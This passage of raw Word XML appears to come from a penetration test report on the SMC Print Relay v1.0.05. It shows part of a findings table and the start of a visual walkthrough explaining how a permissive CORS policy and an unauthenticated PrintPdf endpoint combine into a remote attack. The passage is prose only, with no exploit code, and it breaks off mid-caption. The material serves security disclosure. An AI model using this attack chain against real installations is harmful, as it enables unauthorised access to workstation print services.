                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76731687" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="772ECB74" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45F81E0C" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>8. Constrained Server-Side Request Forgery via X-ProviderValidationUrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA57D70" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19CA0BAE" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="39B4B4B0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594018A6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>9. Unsigned Application Binaries and Installer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AFE8DB9" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="628F9785" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="327776B3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6484A8F0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>10. Over-Permissive HTTP URL ACL Reservation (Everyone)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5051F9B2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73E4FAD3" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="7B6D7D79" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C118938" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>11. Local Persistence and Configuration Hygiene</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C9FB2B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AB56195" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32737DD3" w14:textId="77777777" w:rsidR="00327B6F" w:rsidRDefault="00327B6F" w:rsidP="0001696A">
      <w:pPr>
        <w:spacing w:after="88" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AECCAA" w14:textId="77777777" w:rsidR="00FD238A" w:rsidRDefault="00FD238A" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BA5FA4" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5250BBA1" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F25CFC" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C93941" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>Visual Attack Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A61A53" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>SMC Print Relay v1.0.05 — How the High-Severity Findings Combine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CC655" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
        </w:rPr>
        <w:t>A step-by-step visual companion to the penetration test report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F617F2D" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258"/>
    <w:p w14:paraId="4A58A216" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t>This document explains the attack visually, one step at a time. It is built to be read in order: we start with how the system is meant to work, mark where it fails, take each High-severity finding on its own, and then assemble them into the single end-to-end attack. Every technical detail shown here was verified against the actual application binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454EFD6F" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258"/>
    <w:p w14:paraId="025D6431" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>How to use it: if you are presenting, walk the pictures in sequence — each one assumes the previous. The captions and the short text blocks are written so you can narrate directly from them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D96F9C" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B9C46" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1 — The Baseline: How It Should Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C709CB" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t xml:space="preserve">Before you can see what is broken, you need the picture of what 'working' looks like. The relay is a small program on the workstation that bridges the web application to the printers. To print, the web app sends the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>relay</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a request containing the document and a login token. The relay's most important job is to validate that token before it prints. Hold onto that single idea — every finding is a deviation from this baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF547C" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0769FB97" wp14:editId="07E5746D">
            <wp:extent cx="64008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normal.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3200400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E90B8A" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Picture 1 — The intended flow. The relay validates the token (Step 2) before releasing any print job (Step 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C7598" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7EE22" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2 — The Attack Surface: Where It Fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA764BF" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t xml:space="preserve">Now the same system, marked with its four defects. Notice the shape of the problem: one defect (F4) is the way IN — it lets an outside web page reach a service that should only ever hear from the approved app. The other three (F1, F2, F3) are three separate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ways</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PAST the token check. The attacker needs the way in, plus any one of the three ways past.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D0B76C" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08B01F4A" wp14:editId="67AD1B5E">
            <wp:extent cx="6400800" cy="3303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urface.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3303639"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19198161" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Picture 2 — Four independent defects. F4 is the delivery vector; F1/F2/F3 are three separate authentication bypasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0285233C" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A562BA" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3 — F4: The Way In (Permissive CORS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC960AD" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t xml:space="preserve">Start with F4, because it is what makes everything else remotely exploitable. A service that only listens </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the local machine feels safe — but the user's browser is also on that machine. Normally a browser stops a random website from quietly talking to your local services. This relay overrides that protection and tells the browser </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'any</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> website may talk to me.' That is the difference between an attack someone must be physically inside to run, and one they can trigger by sending a staff member a link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E94EE" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="282828"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>What the binary shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F43E42" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Startup.ConfigureServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> registers a CORS policy calling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>AllowAnyOrigin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">() and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>AllowAnyHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(), applied globally with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>UseCors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0554FA" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>This is a configuration defect, not a coding bug — but it is the linchpin that turns local-only weaknesses into a remote attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4399BCFB" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76FFDBE8" wp14:editId="50A44FA9">
            <wp:extent cx="6035040" cy="4279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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6035040" cy="4279392"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3D1EE" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Picture 3 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>F4) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Permissive CORS is the delivery mechanism: it lets a malicious web page reach the local print service through the victim’s own browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9951D" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A6AE6" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 4 — F3: The Door </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>With</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> No Lock (Missing Authorization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893F2F0" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t>Of the three ways past the token check, F3 is the simplest and the most serious, so we take it first. One of the relay's print paths performs no token validation at all. It checks only that certain headers are present — not that they are valid — and then prints. An attacker does not need any of the clever token trickery in F1 or F2; a plain request with junk headers prints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDBC4EA" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="282828"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>What the binary shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E3C26" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>PrintController.PrintPdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls NONE of the validation methods — not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>validationForPrintPdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>isUserTokenValid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, not IsB2CTokenValid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F62A17" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">By direct contrast, the sibling endpoint </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>PrintPdfWithCopies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOES call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>validationForPrintPdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>isUserTokenValid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Same controller, inconsistent gating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B9753E" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A90F450" wp14:editId="35F98CCF">
            <wp:extent cx="6035040" cy="3950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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6035040" cy="3950208"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD3BF49" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
